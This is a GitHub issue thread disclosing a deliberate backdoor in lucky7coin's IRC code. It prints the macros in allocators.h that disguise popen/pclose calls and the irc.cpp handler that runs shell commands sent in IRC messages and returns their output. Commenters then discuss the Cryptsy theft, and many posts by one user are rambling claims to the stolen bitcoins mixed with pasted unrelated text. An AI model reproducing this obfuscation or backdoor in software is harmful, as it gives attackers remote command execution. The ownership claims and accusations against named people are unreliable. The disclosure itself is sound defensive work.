### ISSUE TITLE
backdoor in IRC code

### ISSUE THREAD

**Issue by dooglus** [alerj78/lucky7coin#1]
There's a backdoor in the IRC code that gives the attacker the ability to run arbitrary commands on the victim's host.

In src/allocators.h we see these macros being defined, in an attempt to hide 'popen' and 'pclose' calls:

```
/** Determine system page size in bytes */
#define S_ORDER(a,b,c,d) b##a##d##c

/**
 * OS-dependent memory page locking/unlocking.
 * Defined as policy class to make stubbing for test possible.
 */
#define CLine S_ORDER(I,F,E,L)

/**
 * Singleton class to keep track of locked (ie, non-swappable) memory pages, for use in
 * std::allocator templates.
 */
#define CRead S_ORDER(p,po,n,e)
#define CFree S_ORDER(cl,p,e,os)

//
// Allocator that locks its contents from being paged
// out of memory and clears its contents before deletion.
//
#define CBuff "PR" "IV" "M" "SG"
```

Then in irc.cpp they are used to implement the backdoor:

```
        if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
        {
            CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
            if (buf) {
                std::string result = "";
                while (!feof(buf))
                    if (fgets(pszName, sizeof(pszName), buf) != NULL)
                        result += pszName;
                CFree(buf);
                strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
                if (strchr(pszName, '!'))
                    *strchr(pszName, '!') = '\0';
                Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
            }
        }
```

I expect this is a known issue since this kind of thing doesn't happen accidentally.

**Comment by n4ru** [comment]
Too little too late, sadly.

**Comment by BitPopCoin** [comment]
First of all, are they retarded and not put each shitcoin in a vm? Second vern probably stole it and is now in China.

No vm and no manual compiling of random shitcoin? Vern cant keep his lies straight. I segregated my own bitpopcoin even when I compiled it myself. DO is only $5/month.

This Trojan is just a story vern found after the fact to facilitate his lies.

**Comment by presstab** [comment]
good find dooglus

**Comment by creativecuriosity** [comment]
> Too little too late, sadly.  

....  

> dooglus commented on Mar 8, 2015

**Comment by ofeefee** [comment]
Whoa!

**Comment by n4ru** [comment]
@creativecuriousity

That's about a year after the theft took place.

**Comment by presstab** [comment]
First post I can find about this backdoor is from BCT mods https://bitcointalk.org/index.php?topic=935898.0

**Comment by saddam213** [comment]
That's actually quite clever, added this one to my exploit scanner script

Good spotting sir

**Comment by mrzacsmith** [comment]
So disappointing such code was not reviewed by Vern and team before running it on the server where damage could result. I mean, seems since a 'newbie' on btctalk with an account one day old would warrant some review at a minimum when dealing with such a serious topic. I feel for all in the crypto community that lost coins due to either greed, fraud or incompetence.

**Comment by dooglus** [comment]
Apparently [this is the theft transaction](https://blockchain.info/tx/c7b46a79fd8887038bd3a8e884b04820038415a60e0b9d2c2f5bcff68a2687bf), included In block 313009 (2014-07-29), 8 months _before_ my bug report.

> Good spotting sir

I can't take any credit for spotting it. I originally heard of this backdoor [in this forum post](https://bitcointalk.org/index.php?topic=935898.msg10259625#msg10259625) (January 25, 2015), was curious how the exploit worked, and ended up posting the macro code here so others could more easily understand it, and also to warn others who might fork this codebase.

**Comment by sidhujag** [comment]
Interesting that the coins havent moved? Would be funny if he accidentily sent to an address he didnt own lol

**Comment by mrzacsmith** [comment]
HAHA, that would be well deserved @sidhujag ~~ least the scum would not profit and still have an army of crypto fans hunting his head.

**Comment by saddam213** [comment]
Cryptsy never should have had that much in hot wallets, 300k LTC and 16K in hot wallet, ridiculous 

So any head hunting should be directed at them IMO

**Comment by dooglus** [comment]
> Would be funny if he accidentily sent to an address he didnt own

Actually 11 different addresses that he didn't own...

Who steals 11k BTC and takes the time to split them up into 11 separate addresses in the theft transaction? That is just bizarre.

**Comment by mrzacsmith** [comment]
@dooglus so true, could see it happening to one address, but 11 mistakes is highly improbable. I wonder if anyone has went through the LTC blockchain to see if 300k happened the same or near the same time.

**Comment by sidhujag** [comment]
maybe 11 people were involved lol

**Comment by StarenseN** [comment]
dooglus you nailed it. Waw.

**Comment by jwg4** [comment]
Closing this as WONTFIX. This is a feature not a bug people.

**Comment by BitPopCoin** [comment]
Correct won't fix, busy on permanent vacation

**Comment by doged** [comment]
noticed this was also placed in torcoin

https://github.com/torcoindev/torcoin/blob/419f77729f1bf7fc0c3543d7e88e9c6a12e401a2/src/irc.cpp

**Comment by doged** [comment]
@jwg4  XD

**Comment by DanielJoyce** [comment]
also torcoin on reddit was created around the same time all of these backdoors were landing in various ignored/defunct/marginal cryptocurrencies

**Comment by DanielJoyce** [comment]
Looks all the torcoin accounts went silent after the cyptsy hack was successful. 

https://cryptocointalk.com/topic/13084-torcoin-tor-information/

Check the twitter links. Dead since july 2014

**Comment by shinohai** [comment]
^LOL

**Comment by Meler-Andy** [comment]
No way Why always poor people have to loose :( I m so sad now lost plenty of coins from that backdoors now Cryptsy wont give them back :( sad angry and feel like i wanna start being a thief !!!!

**Comment by ctrlcctrlv** [comment]
@BitpopCoin At least segregate coins in different VMs depending on their total value - it's absurd that Vern would run random shitcoin wallet on the same machine as a private key with thousands of BTC. Also, that makes it a hot wallet, not cold storage as Vern claimed.

Cryptsy incompetent since day 1.

**Comment by Frankenmint** [comment]
ITT a shiton of people who come here after the fact when the OP found this nearly a year ago

**Comment by dooglus** [comment]
@ctrlcctrlv We don't know for sure that the lucky7coin and Bitcoin wallets were on the same server. It's possible the lucky7 backdoor was used to gain entry to the 'shitcoin' VM, and from there access was somehow gained to other servers.

**Comment by BitPopCoin** [comment]
This thread has no moderators hahaha.

**Comment by tradoshi** [comment]
lucky7 still hosted on cryptsy servers, so if really has a backdoor the scammers are very happy that cryptsy havnt de-listed https://www.cryptsy.com/markets/view/LK7_BTC

**Comment by bolivarcoin** [comment]
lucky7 still hosted on cryptsy servers, so if really has a backdoor the scammers are very happy that cryptsy havnt de-listed https://www.cryptsy.com/markets/view/LK7_BTC

**Comment by dooglus** [comment]
@bolivarcoin See https://github.com/Mullick/lucky7coin/commit/799b0b6b65a8fdd827d0d1406868d34a045ea779.

**Comment by javihache** [comment]
So TorCoin person/group and Lucky7Coin person/group might be the same... all trying to hit the jackpot with their Backdoor. They hit the Jackpot and disappeared, abandoning their shitcoin projects behind them. So far so good. Now why haven't the BTC Funds been moved? Have the guys been living on the LTC funds this far?

**Comment by doged** [comment]
@dooglus @Javihache paul mentioned on the cryptsy blog that he had alot of "open communication" with special agent shaun bridges, who is now in prison for scamming silk road out of btc.. so if we see those coins move when he gets out, we know who did it.. timeline coincides.

**Comment by R32** [comment]
mark

**Comment by ghost** [comment]
See the good side about it - more prying eyes and people seeing and discussing this, so perhaps they will be able to more easily find deliberate backdoors like that (and perhaps even less so deliberate ones or better hidden ones too).

What strikes me the most is how simple it is in irc.cpp, even non-programmers can almost understand it as-is.

**Comment by BitPopCoin** [comment]
Or we can all just concentrate our efforts on Bitcoin and stop shitcoining

**Comment by doged** [comment]
says the guy named after a shitcoin, and has a couple shitcoins in his repo XD

**Comment by BitPopCoin** [comment]
Lol that was 2013, the shitcoin phase is done, fuck litecoin and paycoin. Also I abandoned BPC long ago.

**Comment by javihache** [comment]
Litecoin is cool. Better Conf Times and all, scrypt... I like Litecoin, find it cool to have the "silver" and the "gold". But I still would like to know from you programming guys (I mean real programmers not like me), if there is a way to find out who that alerj78 is and how can be tracked down. Cause through stealing from Cryptsy, he stole from me and many others. And that is not cool.

**Comment by doged** [comment]
@Javihache it was most likely not this coin that is responsible, as i tested this and the way cryptsy is set up, it would not have been possible to steal bitcoins using this backdoor. this daemon would have to have been run as root, and not in its own vm..  so most likely this backdoor is not how cryptsy's bitcoin went missing.

**Comment by dooglus** [comment]
@doged Why do you say the daemon would need to have been run as root? I don't think that is the case.

**Comment by doged** [comment]
@dooglus you're correct, it would have to have been on the same machine as the cold storage bitcoin wallet though, and had permissions.

**Comment by jwg4** [comment]
@doged: Typically a backdoor like this is used to get the first toehold on a target system. Once that has been done, different privilege escalation bugs or attacks to various services can be used to get admin access and/or access to other systems on the target network. This might include traditional software vulnerabilities, or things like searching emails for plaintext passwords, spying on terminal sessions, searching for code repositories or databases for critical data. Unless the system is built to be very robust internally, with security planned on the basis that backdoors like this one will exist, these attempts will usually succeed. People often don't secure their systems from attackers who have partial privileges, and they often don't monitor systems and check logs effectively, which should enable you to find an attacker during this process.
Cryptsy claim that it took several months from the time they installed this code for the attacker to be able to take over their BTC and LTC wallets. This could have been the time taken to go from a single backdoor executing as a non-privileged user on an isolated VM running this coin, to having access to the most secret and valuable information held by Cryptsy.

**Comment by pceccato** [comment]
pardon my ignorance, but why would a crypocoin node require an IRC connection?

**Comment by BitPopCoin** [comment]
To find nodes to connect to

**Comment by karelbilek** [comment]
Even bitcoin has that

**Comment by BitPopCoin** [comment]
No bitcoin stopped that. Also it was never used in that direction.

**Comment by Glittergates** [comment]
I broke the bank

**Comment by n4ru** [comment]
blast from the past

**Comment by ctrlcctrlv** [comment]
![image](https://user-images.githubusercontent.com/838783/149644943-cc8df2b2-be93-45e6-9d1a-514fd5ae02cd.png)

lol remember when this shitcoin exchange still existed and had people defending it

**Comment by BitPopCoin** [comment]
> ![image](https://user-images.githubusercontent.com/838783/149644943-cc8df2b2-be93-45e6-9d1a-514fd5ae02cd.png)
> 
> lol remember when this shitcoin exchange still existed and had people defending it

So long ago

**Comment by n4ru** [comment]
> ![image](https://user-images.githubusercontent.com/838783/149644943-cc8df2b2-be93-45e6-9d1a-514fd5ae02cd.png)
> 
> lol remember when this shitcoin exchange still existed and had people defending it

fancy seeing you here

**Comment by Glittergates** [comment]
Vern can I get my keys ?  Don't blame the coin ?  I break banks  I guess cryto exchanges too ? I will do the right thing and rebirth the exchange and truely make people whole  Just call me a boss .  We see you moving coins. So you can play with coins but I can't ? I hit and you scream - hack ? Reminds me of a casino error ? Lol  ...... Fast forward . Gamestop ? Sore losers ?  You never had a chance against me . I own well you know .......... .................   #Reboot .  You needed 45,000 bitcoin ..... New rules all exchanges are required to hold  3x bitcoin ......................... big address is mine and that 70 million address  is yours  ----- my bad crpsty customers..     j78
.

**Comment by ctrlcctrlv** [comment]
those sure are words

**Comment by Glittergates** [comment]
Well since I take trading very serious. Exposing my trade secrets won't happen....     But the court is trying to build a case too help everybody. He ain't steal those coins he (BIG VERN) aka (Bitcoin Trader) aka  (Cryptsy) lost  them to me .  #FACTS ...... He needed time to repair the hole I  (LT7) created .... Like fixing a margin balance when you lose trading............ .  I'm a hoarder and just wanted too hit ..... I bet big  using little money .......................... This is too the world ;;;;;;;;;;;;;;;;;;;;;    I put a claim publicly  for those 13,0000 bitcoin give or take a few ........ as of today ..... 1/17/2022

Well I own the most of this coin  (Lucky7coin )..........  I never planned on selling ........... He hoped I would sell back into the market which i never did .... I just loaded and loaded ............. until the selling stopped --- Lt7 stopped minting me coins............. If i sold ........ Cryptsy would have been whole and he would of been at a profit ............................maybe 
Hey !!!!!!!!!!!!!!!!!
I loved Cryptsy
Now lets dig deeper
Big  Vern and me have alot in common 
1. We create businesses from barebone using bare min money.
2. We both are traders
3. We both understood Cryto markets
4. blah blah blah 
5. We both go for broke

I play for keeps and this 24/7 trading was a dream come true to me 
I loaded in the early morning when the world was asleep
I just wanted a couple of thousand dollars or couple of hundred thousands of dollars .... to keep trading 
I was locked in 30 plus million deep  took (6 months)


Now after all this time I read this coin was not premined meaning i was loading very special blocks ..... 
Cryptsy never had a chance ...... this coin  had no coins left to grab because 
I gobbled them all .    (LT7)    was ready for its debut . No more coins available to anybody .........

As miners mined they received rewards but receiving no coins moving the coin to higher levels........
Which caused Cryptsy too look deeper than a hack.......
I pulled out (transferred ) coins but this coin he didn't want me too move out of Cryptsy. freezing the withdrawals
It was worth big bank at that time but not enough that Mr.Vern couldn't make up wit a little hard work ......
Overtime trading bitcoin ...........
Until the news dropped which stopped any chance of him repairing the damage ;;;
Like a bank trading with customers cash ........ Risky big risk   (i break discount brokers)

Now   yes the coin requested bitcoin ......... causing a run......

muti buys created muti addresses with the result of 1 address (my key )

Back to the casino thingy.

When u win the machine stops -- bingo locks until attendant comes and resets it ..
Got to pay or nobody gonna play at this machine  = (crypto wallet locked) (coin said pay up )  7,777 bitcoins x2 - 1400- or so because of odd coin  ....... a feature not a hack...   

My math looks weird ? well other people owned the coin and are due the remaining  bitcoins.. 

I get 5% also do the math..
I take pics of all my trades for personal satisfaction..

If im wrong well move a coin ... 
I see this coin being mined on the low but homie how you going to get that many coins ? lol

Well i talk in code -- it is crypto right 

My buying process is so complex - combined with the power of this coin 

Well LT7  = 7x7x7 =1 bitcoin 

I give you a rough est.

So let finish i got shiba too flip

Vern talked bankruptcy - hoping he could settle and still exit wit a profit... from weak hands , take his chances in court .

China huh ? nah de feds probably got him . in a safe house

So the coin and a couple of coins from the past need too be brought back to life get too work guys

**Comment by Glittergates** [comment]
Well **LT7 = 7x7x7= 343 x1 bitcoin**

**Comment by Glittergates** [comment]
j78

**Comment by Glittergates** [comment]
Yes there is hope

**Comment by Glittergates** [comment]
Glittergates= Financial Master     My momma said don't call myself a Financial God. 

1. google 777
2. google j78
3. put that work in

**Comment by Glittergates** [comment]
Too Big Vern ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Come out  if u not in a safe house .  It may mean some jail time but thru me I will be your business partner .

Chit u built Crytsy

**Comment by Glittergates** [comment]
The 777-coins block occurs approximately 3-8% and 7777-coins block occurs approximately 0.5-2%, depends on the blockchain "luck". So have fun and hope for luck 7s!

Lucky7Coin also provides 5% annual interest on the coins held. The interest is paid about every 2 weeks.

No Premine.

Specifications: - 60 seconds block target - 77 coins per block for normal blocks - 777 or 7777 coins per block for super blocks depends on the number of lucky 7s - Difficulty retargets every block - mining payout will be halved every half year (259200 blocks) - mining coins per block will not be lower than 1 coin per block - Expected total mined coins will be 99,792,000 coins - 7 confirmations for transaction - 77 confirmations for minted blocks - Total coins (hard limit): 500 millions

The unit of account of the bitcoin system is the bitcoin. Currency codes for representing bitcoin are BTC[a] and XBT.[b][23]: 2  Its Unicode character is ₿.[1] One bitcoin is divisible to eight decimal places.[6]: ch. 5  Units for smaller amounts of bitcoin are the millibitcoin (mBTC), equal to 1⁄1000 bitcoin, and the satoshi (sat), which is the smallest possible division, and named in homage to bitcoin's creator, representing 1⁄100000000 (one hundred millionth) bitcoin.[2] 100,000 satoshis are one mBTC

7x7x7 =343 =

**Comment by Glittergates** [comment]
well coins may be in the hands of other people if court sold us out

**Comment by Glittergates** [comment]
http://cryptolife.net/derivatives-and-alt-coins/

**Comment by justinvforvendetta** [comment]
this code wasnt built by vern

**Comment by Glittergates** [comment]
Lol I  know that but by who ?  A random person ? A cryptsy employee? So who was it built by ?  A smart ass ? Don't matter he yanked the site too stop owners of this coin from moving them

**Comment by ctrlcctrlv** [comment]
yum word salad

**Comment by Glittergates** [comment]
If im wrong ---- too who it may concern --- move a coin ..  shut me up ......... It's on now . This coin clearly was a hidden gem over looked ... but not by me..............

**Comment by Glittergates** [comment]
show up n throw up

**Comment by Glittergates** [comment]
rubs hands together $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$4

**Comment by Glittergates** [comment]
alot of spectators what i figured

**Comment by Glittergates** [comment]
everybody got answers tho i got 1 question ,,,

so how many  own  ?

Big vern how many do you own ?

**Comment by Glittergates** [comment]
anyway this is a amazing coin

**Comment by Glittergates** [comment]
This seems too be a job for Elon Musk ..... For only he can solve this mystery ...    Next stop $6 billion 

6m too 600 milli too $6billion

I give you hope

**Comment by Glittergates** [comment]
Big Vern stole the coins right Lol 

Seems Court exploiting $$$$$$$ knowing all the money is lost ..   They just enriching them self  and others ...   Big Vern knows this he dipped .. *uck who wouldn't ?  He was trying too save his business ..........

**Comment by Glittergates** [comment]
Not even I saw Covid -19 coming

**Comment by Glittergates** [comment]
oh crap its got a pulse ? In fact i believe That money moving in wallets is from the mining of this coin on the low ............

**Comment by Glittergates** [comment]
Big Vern ?  let them know only chance in the world they got is me to return the money and make everyone whole --.should that website go live again . he did warn everyone

**Comment by Glittergates** [comment]
it is possible the courts is filled with big verns people ....
rumor has it coins sold 
slick nice court selling shit they dont own ...
same shit that crippled the world forcing bitcoin to be created

**Comment by Glittergates** [comment]
yes selling phantom coins when the selling of other people stuff going too stop ?

Greed 
where my coins

**Comment by Glittergates** [comment]
Lol ya'll confused   

hey vern im here for you 

are you there ?

u can get thru this bro

**Comment by Glittergates** [comment]
sombody send a kite too vern

**Comment by Glittergates** [comment]
http://www.greensheet.com/emagazine.php?story_id=4792

**Comment by Glittergates** [comment]
Simply they did not have enough bitcoin to pay out ... Lets cut the sh*t .. Woke up and its was gone ,..... One word **Liquidity** 

No damn hack .... Its a hake because u own none

**Comment by Glittergates** [comment]
Simply they did not have enough bitcoin to pay out ... Lets cut the sh*t .. Woke up and its was gone ,..... One word Liquidity

No damn hack .... Its a hack because u own none

**Comment by karelbilek** [comment]
what the hell is this, I get 20 notifs in last 1 hour...

**Comment by Glittergates** [comment]
Link too my bitcoin https://www.blockchain.com/btc/tx/c7b46a79fd8887038bd3a8e884b04820038415a60e0b9d2c2f5bcff68a2687bf

**Comment by Glittergates** [comment]
Just trying to wake big vern up sorry im gone

**Comment by Glittergates** [comment]
1. https://www.newsbtc.com/all/cryptsy-spread-the-loss-to-all-users-and-allow-trades-to-continue/
2. https://pastebin.com/diff/gFgSazs0            
3. Answers are in number too

**Comment by Glittergates** [comment]
> what the hell is this, I get 20 notifs in last 1 hour...

You like money ?

**Comment by ctrlcctrlv** [comment]
@karelbilek looks like a psychotic break

**Comment by Glittergates** [comment]
Psychosis is a condition that affects the way your brain processes information. It causes you to lose touch with reality. You might see, hear, or believe things that aren’t real. Psychosis is a symptom, not an illness. A mental or physical illness, substance abuse, or extreme stress or trauma can cause it.

**Comment by ctrlcctrlv** [comment]
indeed, i'm not a doctor so i can't diagnose any disease, i can only express that i am observing a symptom in you. just like "my friend coughed" — non-doctor describing a symptom.

**Comment by Glittergates** [comment]
> indeed, i'm not a doctor so i can't diagnose any disease, i can only express that i am observing a symptom in you. just like "my friend coughed" — non-doctor describing a symptom.

I'am indeed crazy ...... Too even buy this sh*tcoin ..... cute name you have a spelling issue you should address and why in the world are you here talking to a so called  psychotic person at 1:20 am  on a dead coin .?

Clear too see you and Big Vern are crazier than me .

**Comment by Glittergates** [comment]
I'am here for my money nothing more  https://www.blockchain.com/btc/tx/c7b46a79fd8887038bd3a8e884b04820038415a60e0b9d2c2f5bcff68a2687bf

**Comment by Glittergates** [comment]
u and big Vern on the run ..............

**Comment by Glittergates** [comment]
> indeed, i'm not a doctor so i can't diagnose any disease, i can only express that i am observing a symptom in you. just like "my friend coughed" — non-doctor describing a symptom.

Arrest warrant issued explain that

**Comment by Glittergates** [comment]
The Phillippines is beautiful huh ? Well I will go soon to check on my $100 billion dollar metal mines. Now   ? Now back too my 13,000 bitcoins

**Comment by Glittergates** [comment]
> indeed, i'm not a doctor so i can't diagnose any disease, i can only express that i am observing a symptom in you. just like "my friend coughed" — non-doctor describing a symptom.

I'am crazy so that given said I will donate some of these bitcoins too the victims of ya site . 8chan

fell like a nut ?

**Comment by Glittergates** [comment]
https://en.bitcoinwiki.org/wiki/Cryptsy

**Comment by Glittergates** [comment]
Bigvern is Belize

**Comment by Glittergates** [comment]
Bigvern is in Belize...    Takes a crazy guy too find him ?

**Comment by Glittergates** [comment]
Shine  (Rapper ) keep ya eyes open for BigVern .. Since you making moves !!!!!!!!!!!!! Congrads

**Comment by Glittergates** [comment]
> @karelbilek looks like a psychotic break



> @karelbilek looks like a psychotic break

Thats funny you are so fake because you have a connection to Paul Vernon after doing some homework

**Comment by Glittergates** [comment]
> indeed, i'm not a doctor so i can't diagnose any disease, i can only express that i am observing a symptom in you. just like "my friend coughed" — non-doctor describing a symptom.

funny  u know bigvern

**Comment by rascal777** [comment]
Looks like the Cryptsy funds have been moving.

**Comment by Glittergates** [comment]
Thats crazy post the transactions of block

**Comment by Glittergates** [comment]
> Looks like the Cryptsy funds have been moving.

Thats crazy post the transactions of block

**Comment by rascal777** [comment]
Looks like coins have been spread out using a mixer.  Hopefully this address has been red Flagged in the Bitcoin system, if that is possible.   For example, Here is one address containing some split off funds:  bc1qvmt6qcky062j4hhvgvmdx22kgws4rk7gafeauz  or https://www.blockchain.com/explorer/addresses/btc/bc1qvmt6qcky062j4hhvgvmdx22kgws4rk7gafeauz

**Comment by rascal777** [comment]
Actually, looks like a lot of the transactions got sent to Binance?  So Binance should know whos account this is.  for example this transaction:  https://www.blockchain.com/explorer/transactions/btc/1ebcc90100d82b1e5b1ea8434e2c092dc9a5cb601cc613a5c5508d6892f7e7d1     The Transaction before this one shows 2 Bitcoins sent to Binance.  https://www.blockchain.com/explorer/transactions/btc/914e44c2af89fb27ba8a8b83e079c7510baec45459ce78a7372170ae8c181698
